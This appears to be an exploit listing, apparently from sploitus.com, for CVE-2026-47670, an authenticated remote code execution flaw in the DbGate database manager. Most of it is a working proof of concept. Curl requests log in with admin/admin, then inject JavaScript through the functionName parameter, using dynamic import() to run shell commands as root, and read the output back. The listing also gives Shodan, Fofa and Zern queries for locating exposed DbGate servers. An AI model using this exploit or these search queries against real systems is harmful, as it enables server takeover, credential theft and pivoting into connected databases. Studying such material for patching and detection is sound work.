Share 
## https://sploitus.com/exploit?id=B465A130-C879-5825-89F0-6EB7CB8DCEBD
# CVE-2026-47670

[![Python](https://img.shields.io/badge/Python-3.12%2B-blue.svg)][01]
[![CVSS](https://img.shields.io/badge/CVSS-9.9%20CRITICAL-darkred.svg)][03]
[![License](https://img.shields.io/badge/License-SCTPL-green.svg)](./LICENSE)
[![Educational](https://img.shields.io/badge/Purpose-Educational%20Only-yellow.svg)](./LICENSE)

Authenticated Remote Code Execution via loadReader functionName code injection in DbGate

[DbGate][08] is an open-source, cross-platform database management tool
designed for developers and database administrators who need to work with
multiple database systems simultaneously. It provides a unified web-based
and desktop interface for managing both SQL and NoSQL databases - including
MySQL, PostgreSQL, SQL Server, MongoDB, SQLite, Oracle, and others - without
switching between different client applications. DbGate runs as a standalone
desktop application on Windows, macOS, and Linux, or can be deployed as a
web application via Docker, making it popular for team environments and
remote database administration scenarios.

**CVE-2026-47670** is an **authenticated Remote Code Execution** (RCE)
vulnerability affecting DbGate versions **prior to** *7.1.9*. The flaw
exists in the `/runners/load-reader` endpoint, where the `functionName`
parameter is passed to an unsafe code execution path without proper
sanitization. An attacker with valid DbGate credentials can inject arbitrary
JavaScript code through this parameter, which gets **executed** on the server
with **root privileges**. The vulnerability is particularly dangerous because
the application's `require = null` mitigation can be trivially bypassed
using dynamic `import()` statements, allowing attackers to **spawn shells**,
**exfiltrate database credentials**, pivot to connected database servers,
or fully compromise the host system.

## PoC

```bash
# Step 1 โ€” authenticate and obtain Bearer token
curl -s -X POST http://example.com/auth/login \
  -H 'Content-Type: application/json' \
  -d '{"amoid":"logins","login":"admin","password":"admin"}' | grep accessToken

# RESPONSE
# ========
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y"}

# Step 2 โ€” inject via functionName (replace TOKEN and /tmp/_dbg_poc.jsonl)
curl -s -X POST http://example.com/runners/load-reader \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y' \
  -d '{"functionName":"csvReader\nvar _f=await import(\"fs\");var _c=await import(\"child_process\");var _o=_c.execSync(\"id\").toString().trim();_f.writeFileSync(\"/tmp/_dbg_poc.jsonl\",JSON.stringify({__isStreamHeader:true,columns:[{columnName:\"out\"}]})+String.fromCharCode(10)+JSON.stringify({out:\"CANARY \"+_o})+String.fromCharCode(10));//","props":{}}'

# RESPONSE
# ========
{"apiErrorMessage":"The \"body\" argument must be of type function or an instance of Blob, ReadableStream, WritableStream, Stream, Iterable, AsyncIterable, or Promise or { readable, writable } pair. Received undefined"}

# Step 3 โ€” read back command output
curl -s -X POST http://example.com/jsldata/get-rows \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6ImxvZ2lucyIsImxvZ2luIjoiYWRtaW4iLCJpYXQiOjE3ODE3NzMwNDIsImV4cCI6MTc4MTc3NjY0Mn0.M61gw5bidF2kyzZwRukwzv0yxm3Zj0tUItdPqCXDQ_Y' \
  -d '{"jslid":"file:///tmp/_dbg_poc.jsonl","offset":0,"limit":100}'

# RESPONSE
# ========
[{"out":"CANARY uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}]
```

## Usage

```txt
python CVE-2026-47670-X7.py
```

* [Zern][03]    : `title:"DbGate"`
* [Fofa][04]    : `title="DbGate"`
* [Shodan][05]  : `http.title:"DbGate"`

## Reources

* [OpenCVE - CVE-2026-47670][01] *(not yet published)*
* [NIST - CVE-2026-47670 Detail][02] *(not yet published)*
* [Gitlab Advisory Database - CVE-2026-47670][06]
* [Github - DbGate: Database manager for MySQL, PostgreSQL, SQL Server, MongoDB, SQLite and others][07]

## Authors

* ErrorInside // SCT

## License

SCT-PL

[01]: https://app.opencve.io/cve/CVE-2026-47670
[02]: https://nvd.nist.gov/vuln/detail/CVE-2026-47670
[03]: https://zern.io
[04]: https://en.fofa.info/
[05]: https://www.shodan.io/
[06]: https://advisories.gitlab.com/npm/dbgate-api/CVE-2026-47670/
[07]: https://github.com/dbgate/dbgate
[08]: https://www.dbgate.io/